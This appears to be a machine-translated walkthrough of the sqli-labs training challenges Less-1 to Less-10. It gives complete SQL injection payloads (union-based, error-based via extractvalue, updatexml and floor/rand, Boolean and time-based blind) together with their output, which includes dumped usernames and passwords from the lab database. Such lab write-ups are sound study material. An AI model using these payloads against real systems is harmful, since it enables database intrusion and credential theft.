sqli-labs Basic Challenges Less1-10

SQL Inject

The summary written above ：

Less 1-9 The main order of increasing the difficulty of ：

1. The correct specific information can be seen , The specific information of the error can be seen ：

Less1-4, Use union select Display the required fields with correct specific information ;

Pay attention to judge whether it is integer or character 、 Single or double quotes 、 Whether there are brackets .

2. Correct specific information is not visible , The specific information of the error can be seen ：

Less 5-6,Double injection type , Use error injection .

3. Only right 、 error message , No details ：

Less8, Blind annotation based on Boolean , One by one, the table names are exploded 、 Name 、 The data content .

4. There is no information

Less 9-10, Time based blind annotation , If the previous fields are correct , Then execute the delay function -.

Less1 and Less2 Available ideas

1. Determine whether the injection point is character type or integer type ：

Input 2-1, If it's an integer ,2-1 Will be regarded as 1; If it's a character type ,‘2-1’ Will be treated as ’2’.

This involves MySQL Implicit type conversion for , Reference link ：https://www.jb51.net/article/101531.htm

2. If it's a character type , Judge whether the two ends are single quotation marks ：

2-1" normal ,2-1' Is not normal , Description is single quotation mark .

' or '1' = '1 If it works properly , Note that both ends are single quotation marks , And characters such as spaces are not filtered .

May be used # perhaps --, They are all SQL In line comments for , You can comment out the quotation marks .

If you use #, Notice that it is URL The reserved characters of , You may need to escape .

If you use --, You need to add a space after it , To prevent the spaces at both ends from being filtered , You can also add other characters to the space .

3.union select The joint query

The first step is to determine the number of columns ：

Can pass union select 1,2,3... You can determine the number of columns ;

It can also be done through order by n Determine the number of columns , It means to pass the n Columns sort the data table .

The second step is to determine the columns that can be displayed ：

about 1' union select 1,2,3 #, Maybe due to the setting , Only the first item of multiple results is displayed .

So want to use ' union select 1,2,3 #, The first result is empty , So it shows the result of self construction , For example, display 2. It shows that 2 Column , After that, you only need to construct the 2 Just list .

The third step ： utilize information_schema

1. Get the existing database name

select database()

Get all database names

select schema_name from information_schema.schemata

2. Get the table name of the required database

select table_name from information_schema.tables where table_schema = database()

3. Get the column name of the desired table

select column_name from information_schema.columns where table_name=' Required table name ' and table_schema=database()

4. Get all the data of the required table

select col1, col2,... from Required table

Be careful ：

group_concat(schema_name), Display as a group , The results of multiple columns and rows are merged into one row , Not limited by rows . Rows are merged into groups , Separated by commas . Columns and columns are merged directly , You can add separators by yourself , Such as group_concat(col1,',',clo2,',',col3).

In use union select When debugging , Notice the quotation marks constructed in front 、 There should be a number of columns 、 final -- Any character .

Less-3 GET-Error based-Single quotes with twist-String

When doing a question error The idea of ：

?id=1	// normal 
?id=1' -- -	// Is not normal , Explain what's inside ' Has been replaced by , Cause single quotation mark pairing failure 
?id=1\' -- -	// Normal return , explain \' Replaced with \\'
?id=1\' union select 1 -- -
?id=1\' union select 1,2 -- - // All return normally , explain select It is likely to be filtered 

The first 3 If you do this, you can't go on , Because I didn't expect select How to get filtered . The results show that The idea is completely wrong ！

1. When testing, you should enter ?id=1' To test , In this way, you can see the error report ：

 check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1

Just like before ?id=1' -- - To test , The returned error result is completely free of errors about parentheses .

Then escape the single quotation marks , It's also a completely wrong idea , This makes select Be treated as id Part of a string , It didn't work at all . As for why it can return normally , Guess because when querying the database , Convert string to int, Just take the first normal character .

2. Continue to do it in the right way ：

?id=1')	// Report errors 
?id=1') -- -	// Normal return 
?id=1') union select 1,2,3 -- - // normal , It means that there are 3 Column 
?id=0') union select 1,2,3 -- - // Show 2,3. explain 2 and 3 Is a displayable column .
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -
// Because only 1 Column , So want to use id=0. Also to display all table names , Need to use group_concat() Join table names . among users The watch looks good 
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- - // Get column name 
?id=0') union select 1,2,group_concat(id,',',username,',',password) from users -- -
// Successfully get all user names and passwords 

Less-4 GET-Error based-Double Quotes-String

?id=1'	// normal 
?id=1"	// Report errors ： for the right syntax to use near '"1"") LIMIT 0,1' at line 1
// Note that the right side is not just a double quotation mark , And parentheses 
?id=1") -- -	// normal 
?id=1") union select 1,2,3 -- -
// Next is the same routine , Until the last 
?id=0") union select 1,2,group_concat(id,',',username,',',password) from users -- -

Less-5 GET-Double Injection-Single Quotes-String

?id=1	// The return is you are in
?id=1'	// Report errors 
?id=1' -- - // return you are in
?id=0' union select 1,2,3 -- -	// Still back you are in
// No more information can be obtained with the previous method 

No idea , Go to Baidu .

The characteristics of the topic are , For correct input , Return the same result . For the wrong input , There will be an error .

So consider An error injection The way , By reporting the wrong information , For the next step .

Error reporting 1：extractvalue()

This function is generally used to XML Document query , Usage is extractevalue( The goal is xml file ,xml route ), It is characterized by reporting errors when there are grammatical errors , And it will show what the error is . for instance extractvalue('anything',concat('~',(select database()))), Because of ~ The beginning is definitely not xml Grammar of form , So you will report an error , When an error is reported, the content of the database will be displayed .

Test it ：

?id=0' and extractvalue('anything',concat('~',(select database())))-- -

You can see the error report ：XPATH syntax error: '~security'

Use this idea to continue ：

?id=0' and extractvalue('anything',concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- -
// Get an error report XPATH syntax error: '~emails,referers,uagents,users', Omit several steps ：
?id=0' and extractvalue('anything',concat('~',(select group_concat(id,',',username,',',password) from users)))-- -
// Get an error report XPATH syntax error: '~1,Dumb,Dumb,2,Angelina,I-kill-y'

Be careful ：extractvalue() Only errors can be reported at one time 32 Characters The length of , If you need to see the rest , You need to use substring Method view .

?id=0' and extractvalue('anything',concat('~',substring((select group_concat(id,',',username,',',password) from users),32,32)))-- -
// Get an error report XPATH syntax error: '~ou,3,Dummy,[email protected],4,secure,cr'

Error reporting 2：updatexml()

This function is used to update the xml file , The grammar is updatexml( The goal is xml file ,xml route , Updated content ).

Fill in the first and third parameters anything, The second parameter is also used concat Function construct a nonexistent xml route . also 32 Bit query .

Test it ：

?id=0' and updatexml('anything',concat('~',(select group_concat(id,',',username,',',password) from users)),'anything')-- -
// If you succeed, you will get an error XPATH syntax error: '~1,Dumb,Dumb,2,Angelina,I-kill-y'

Error reporting 3：floor()

Reference link ：https://blog.csdn.net/wn314/article/details/89297560

Basic knowledge of ：

floor() function , Returns the maximum integer less than or equal to the input parameter ;

rand() produce 0 To 1 Between random numbers ;

rand(X) With X Produce for seeds 0 To 1 Between random numbers ,X unchanged , Random numbers do not change ;

floor(rand(X)*2) produce 0 or 1 An integer random number ;

count(*) and group by Count the type and number of a column of values .

Sentence format ：

select count(*) , floor(rand(14)*2) as x from information_schema.tables group by x

the floor(rand(14)*2) Rename the column to x, And based on x The type of the value of the column counts the table .

An error principle ：

floor(rand(14)*2) Before 4 The first value is 1 0 1 0.

MySQL First, create a temporary table , Progressive scan table information_schema.tables, The first calculation floor The function is worth 1, Query the temporary table and find that no key value is 1 The line of , So I'm going to add a record , here The second time Calculation floor The function is worth 0, So the actual value of the inserted record is (0,1).

MySQL Continue scanning information_schema.tables, The third calculation floor The function is worth 1, Query the temporary table and find that no key value is 1 The line of , So I'm going to add a record , here The fourth time Calculation floor The function is worth 0, There is a primary key conflict when inserting , Getting an error is similar to Duplicate entry '0' for key 'group_key'.

in other words , stay MySQL In the database , Use group by Statement will evaluate the same... Multiple times rand The value of a function , Return a new result each time .

So we can use it concat Function will be constructed by us SQL Statements and floor Function , Make the error result displayed .

Test it ：

?id=1' union select 1,count(*), concat((select version()), floor(rand(14)*2)) as c from information_schema.tables group by c -- -

Be careful union select The correct number of columns should be followed ,concat Function . Get the results Duplicate entry '5.5.44-0ubuntu0.14.04.10' for key 'group_key'.

?id=1' union select 1,count(*), concat((select group_concat(table_name) from information_schema.tables where table_schema=database()), floor(rand(14)*2)) as c from information_schema.tables group by c -- -

do not know why , It's direct here group_concat No use .

Use it. substring：

?id=1' union select 1,count(*), concat(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,100), floor(rand(14)*2)) as c from information_schema.tables group by c -- -

Add one substring Can show …… hold 100 Switch to 153 Can display , Switch to 154 No way. .

Return to get Duplicate entry 'emails,referers,uagents,users0' for key 'group_key'.

Of course, you can also try one by one in the following ways .
limit 0,1 It means to start from the first record , take 1 strip

?id=1' union select 1,count(*), concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1), floor(rand(14)*2)) as c from information_schema.tables group by c -- -
// Get the results Duplicate entry 'emails0' for key 'group_key', So the first table is called referers
// Until limit 3,1 obtain users

Last ：

?id=1' union select 1,count(*), concat(substring((select group_concat(id,',',username,',',password) from users),1,100), floor(rand(14)*2)) as c from information_schema.tables group by c -- -

Partial decomposition can be obtained ：

Duplicate entry '1,Dumb,Dumb,2,Angelina,I-kill-you,3,Dummy,[email protected],4,secure,crap' for key 'group_key'

Less-6 GET-Double Injection-Double Quotes-String

?id=1	//you are in...
?id=1"	// Report errors 
?id=1" -- -	//you are in...

Error injection attempt 1：

1. Test whether it can succeed 
?id=1" and extractvalue('anything', concat('~', (select database()))) -- -
// Report errors  XPATH syntax error: '~security'
2. Name of Pop Watch 
?id=1" and extractvalue('anything', concat('~', (select group_concat(table_name) from information_schema.tables where table_schema=database()))) -- -
// Report errors  XPATH syntax error: '~emails,referers,uagents,users'
3. Name it 
?id=1" and extractvalue('anything', concat('~', (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) -- -
// Report errors  XPATH syntax error: '~id,username,password'
4. Gets all the data in the table 
?id=1" and extractvalue('anything', concat('~', (select group_concat(id,' ',username, ' ', password) from users))) -- -
// Report errors  XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'
// adopt substring To get the following part 
?id=1" and extractvalue('anything', concat('~', substring((select group_concat(id,' ',username, ' ', password) from users),32,32))) -- -
// Report errors  XPATH syntax error: '~ou,3 Dummy [email protected],4 secure cr'

Error injection attempt 2：

?id=1" and updatexml('anything', concat('~', (select group_concat(id,' ',username, ' ', password) from users)), 'anything') -- -
// Report errors  XPATH syntax error: '~1 Dumb Dumb,2 Angelina I-kill-y'

Error injection attempt 3：

1. Confirm the number of columns 
?id=1" union select 1,2,3-- -	//you are in...
2. Test whether the statement can be used 
?id=1" union select 1,count(*),concat((select database()),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
// Report errors  Duplicate entry 'security0' for key 'group_key'
3. Don't do it step by step , Direct listing 
?id=1" union select 1,count(*),concat(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
// I still don't know why I should add substring...
// Get an error report  Duplicate entry 'id,username,password0' for key 'group_key'
4. Burst data 
?id=1" union select 1,count(*),concat(substring((select group_concat(id,' ',username, ' ', password) from users),1,100),floor(rand(14)*2)) as c from information_schema.tables group by c-- -
// Report errors  Duplicate entry '1 Dumb Dumb,2 Angelina I-kill-you,3 Dummy [email protected],4 secure crap' for key 'group_key'

Less-7 GET-Dump into outfile-String

?id=1	//You are in.... Use outfile......
1. Judge whether it is integer type or character type 
?id=18	// Report errors 
?id=18-17	// Report errors , Description is not integer , It's character type . If it is an integer , Will 18-17 Calculated as 1.
2. Judge whether it is single quotation mark or double quotation mark 
?id=1'	// Report errors 
?id=1"	// Don't complain , explain id There must be single quotation marks at both ends . If id Double quotation marks at both ends , There should be no error in single quotation marks , Double quotation marks are wrong 
3. Judge whether there are parentheses after single quotation marks 
?id=1'-- -	// Report errors , But no error echo , You need to guess for yourself , Then the only possible problem is the lack of parentheses 
?id=1')-- -	// Report errors , Add brackets 
?id=1'))-- -	// Don't complain 
4. Judge how many columns 
?id=1')) union select 1,2,3-- -	// Don't complain 

Try writing to an external file ：

Because the server is not on my side , I can't see the document after writing , So I won't consider this problem for the time being .

Less-8 GET-Blind-Boolian Based-Single Quotes

The characteristic of blind injection is that it can only distinguish whether it is right or wrong . No more specific error echo .

1. Construct blind note format , Check for correctness 
?id=1' union select 1,2,3-- -
?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1-- -
// Determine the first character of the table name , Use it carefully and Connect , There is always value on the left , The right side has a value only when the value is correct 
?id=1' and substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='a'-- -

use burp suite Blow it up length：

You can know that the total length of the table is 29.

Next use Python Medium import string string.printable Get all printable characters , Build a dictionary . Reuse burp suite Every one of the test tables ：

The first character you get is e：

And then modify substring(,1,1) by substring(,2,1), Get second m, By analogy , You can get all the table names , Then get all the column names , And then get all the data .

It can be seen that , The whole process is very troublesome , So you can write your own automated script to complete this process . In the process of writing automated scripts , You can use dichotomy to speed up progress .

Less-9 Blind-Time based-Single Quotes-String

Time based blind annotation , The characteristic is that whether it is correct or not, it returns the same .

?id=1' and sleep(3)-- -
// See a significant delay , The injection is successful 
// as a result of , If id=1' Can query the value , Then it will carry out sleep(3); If id=1' The value cannot be queried , They don't execute and Back section . There is a delay , Instructions are executed later , explain and The previous part is correct .

For example, the following ones have obvious delays ：

?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29 and sleep(3)-- -

The method is similar to , Just try one by one . Get the length of the table in order 、 Table name 、 Name 、 Property name .
Less10 The idea is similar , Just replaced with double quotation marks .